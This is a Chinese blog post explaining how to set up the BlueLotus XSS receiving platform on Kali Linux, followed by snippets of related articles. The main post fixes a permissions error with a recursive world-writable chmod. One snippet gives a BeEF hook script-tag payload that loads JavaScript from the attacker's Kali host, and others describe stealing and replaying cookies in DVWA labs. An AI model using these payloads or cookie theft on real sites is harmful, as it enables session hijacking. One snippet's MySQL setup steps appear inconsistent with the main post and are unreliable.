kali系统搭建BlueLotus_XSSReceiver-master

已于 2022-05-14 20:25:47 修改
阅读量1.6k 收藏 2
点赞数 1
文章标签: 安全 web安全 php
于 2022-05-01 10:54:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41687259/article/details/124523627
版权

1.访问GitHub - trysec/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具下载BlueLotus_XSSReceiver-master

2.我的kali系统已安装apache2、php环境,/etc/init.d/apache2 start打开apaache,查看端口号8080。

3.,访问192.168.1.134:8080/BlueLotus_XSSReceiver-master  index.nginx-debian.html  test.php
       出现xss数据存储路径不可写提示。

 4.通过赋予xss数据存储路径、js模板存储路径、我的js存储路径写权限,以及平台根目录写权限(sudo chmod 777 -R ./),chmod 777 -R BlueLotus_XSSReceiver-master/(-R不可落下)

5.密码bluelotus登录界面,正常使用。

fengtianlei159
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XSS平台bxss源码
03-17
XSS平台bxss源码
【CTF工具】搭建自己的XSS平台及使用方法
记录学习成长之路上的点点滴滴
10-12 492
2023/10/21 使用BlueLotus_XSSReceiver搭建自己的XSS平台
XSS另类攻击(四)kali系统beef-xss安装和使用
最新发布
06-01 923
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
XSS数据接收平台
2301_81475812的博客
02-16 1364
存储型则是,在将poc代码注入用户的系统中后,用户访问有存储xss的地方,也会弹出执行的poc代码,即如下图所示;3.我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板,这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。4.提交后,显示安装成功,直接点击登录就跳转到,登录控制面板,输入前面的密码,即可登录到XSS接受面板。进入“我的JS”模块输入要创建的模板名,选择要用的模块,点击插入模块,之后点击新增按钮。4.将复制的payload,放到dvwa的xss模块执。
从零开始搭建轻量级个人XSS平台(BlueLotus_XSSReceiver-master蓝莲花)
weixin_50464560的博客
03-31 6282
一、 前言 决定搭建XSS平台是因为自己想深入学习一下XSS相关的知识,多多进行实践,上网搜索了一下XSS平台有很多,但是总觉得不是很安全,这个毕竟敏感信息要传输到陌生人的服务器上,而且服务器端测试代码存在不可控性,所以决定自行搭建XSS平台做学习之用。在搭建完成后和我的导师徐松进行了交流,发现这款XSS平台除了在GitHub上有作者专业化的说明外,在网上没有任何关于这款XSS平台搭建...
简单xss接收cookie平台的搭建以及xss拿cookie的一些总结
..
01-27 4002
接收平台的搭建_BlueLotus_XSSReceiver 这个是搭建教程: 打Cookie小工具_BlueLotus_XSSReceiver 链接:百度网盘 请输入提取码提取码:tdoj 我是将其搭在服务器上,模拟最真实的攻击环境。搭在服务器上需要几个条件,一是得有apache服务,二是得有php环境。 Linux环境搭建:CentOs + Apache + MySQL + PHP - 云+社区 - 腾讯云 下面说一下在搭建过程中踩的坑。 一、在上传的时候直接上传解压好的_Blue...
轻量级个人XSS平台(BlueLotus_XSSReceiver-master蓝莲花)
DMXA的博客
11-01 743
该源码是由清华大学蓝莲花战队的firesun编,安装方便,功能强大
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
10-01
kali Linux详细指南,后续在更新
Album-Kali_Uchis-PW2021-1
05-09
专辑-Kali_Uchis-PW2021-1
Python库 | kali_source_updater-1.0-py3-none-any.whl
03-21
"kali_source_updater-1.0-py3-none-any.whl" 是一个特定的Python库,根据其命名规则,我们可以推测它主要用于更新Kali Linux系统的源列表。 首先,让我们理解一下`.whl`文件。这是一种Python的安装包格式,全称为...
kali-linux-network-scanning-cookbook_kali_kalilinux_
10-02
Kali Linux网络扫描秘籍》是一本专为网络安全专业人士和爱好者编的指南,它深入浅出地介绍了如何在Kali Linux操作系统中进行网络扫描。Kali Linux,原名BackTrack,是基于Debian的开源渗透测试平台,包含了各种...
xss漏洞之——XSS平台搭建
wsnbbz的博客
03-04 4966
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src="http://127.0.0.1:3000/hook.js"></script> 将127.0.0.1改为kali的ip,之后进行植入 (2)kali...
BlueLotus 下载安装使用
天泽岁月
02-07 1591
BlueLotus 下载安装使用
XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建
tmzy1的博客
03-20 2063
XSS攻击、XSS平台搭建
网络安全学习过程中遇到的问题及解决方案
weixin_44277013的博客
07-25 159
出现原因:PHP版本6中 取消了get_magic_quotes_gpc()函数,首先这个函数的作用:是为了防止sql注入,当该函数打开时将所有单引号,双引号,反斜线和空字符转会自动转为含有反斜线的溢出字符。解决方法:在网络上查找了很久,基本都是更新/升级apt,但使用了这一切方法后,还是无法安装成功,然后使用了。命令,发现系统上本身有的php是8.2的,遂将所有安装的所有包都改为了8.2后,成功安装。解决原因:重新去Oracle上获取新的压缩包。方法一:(搜索的答案,但改了未生效,不知原因)
记录一次使用 BlueLotus_XSSReceiver 及 beEF 配合 XSS 漏洞进行利用
qq_46081990的博客
05-29 267
在没有登出 DVWA 的情况下,打开 Postman,输入 DVWA 的 URL,在 Headers 里面输入获取到的 cookie 值,然后点击 Send 发包。所以我们构造 payload 如下,将其输入到存在 XSS 漏洞的界面的 URL 地址栏中,触发 XSS 漏洞,Win 11 会访问 beEF 的 hook.js。将 payload 输入到存在 XSS 漏洞的界面的 URL 地址栏中,触发 XSS 漏洞,Win 11 会访问 getcookie.js。在 Kali 上打开 beEF(
存储xss环境部署及BlueLotus_XSSReceiver的使用
qq_45970858的博客
04-25 719
下载好bxqtee-BlueLotus_XSSReceiver-master.zip,将其放置在phpstudy中www的目录下,并将其解压 打开phpstudy,创建网站 复制密码,点击提交 安装成功,点击登录 粘贴密码登录
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3476
Kali beef-xss实现Xss详细教程。
Kali Linux-网络安全之-XSS 跨站脚本攻击原理及 DVWA 靶机的搭建
Button12138的博客
12-09 1532
我们输入的信息被存放在name。
kali搭建bluelotus
11-29
根据提供的引用内容,我可以为您提供搭建BlueLotus平台的步骤: 1.首先,您需要在Kali Linux上安装Apache、PHP和MySQL。您可以使用以下命令安装它们: ```shell sudo apt-get update sudo apt-get install apache2 php mysql-server ``` 2.接下来,您需要下载BlueLotus平台的源代码。您可以从GitHub上下载它们: ```shell git clone https://github.com/trysec/BlueLotus_XSSReceiver.git ``` 3.将下载的源代码放置在Apache的Web目录中。您可以使用以下命令将其复制到正确的位置: ```shell sudo cp -r BlueLotus_XSSReceiver /var/www/html/ ``` 4.接下来,您需要创建一个MySQL数据库并将其与BlueLotus平台连接。您可以使用以下命令登录MySQL: ```shell mysql -u root -p ``` 5.在MySQL中,您需要创建一个新的数据库和用户,并授予该用户对该数据库的访问权限。您可以使用以下命令完成此操作: ```mysql CREATE DATABASE bluelotus; CREATE USER 'bluelotus'@'localhost' IDENTIFIED BY 'password'; GRANT ALL PRIVILEGES ON bluelotus.* TO 'bluelotus'@'localhost'; FLUSH PRIVILEGES; ``` 请注意,您需要将“password”替换为您选择的密码。 6.接下来,您需要将BlueLotus平台配置为使用MySQL数据库。您可以编辑“config.php”文件并将以下行中的数据库名称、用户名和密码替换为您在步骤5中创建的数据库和用户的详细信息: ```php define('DB_NAME', 'bluelotus'); define('DB_USER', 'bluelotus'); define('DB_PASSWORD', 'password'); ``` 7.最后,您需要启动Apache和MySQL服务。您可以使用以下命令完成此操作: ```shell sudo service apache2 start sudo service mysql start ``` 现在,您已经成功地在Kali Linux上搭建BlueLotus平台。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fengtianlei159

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值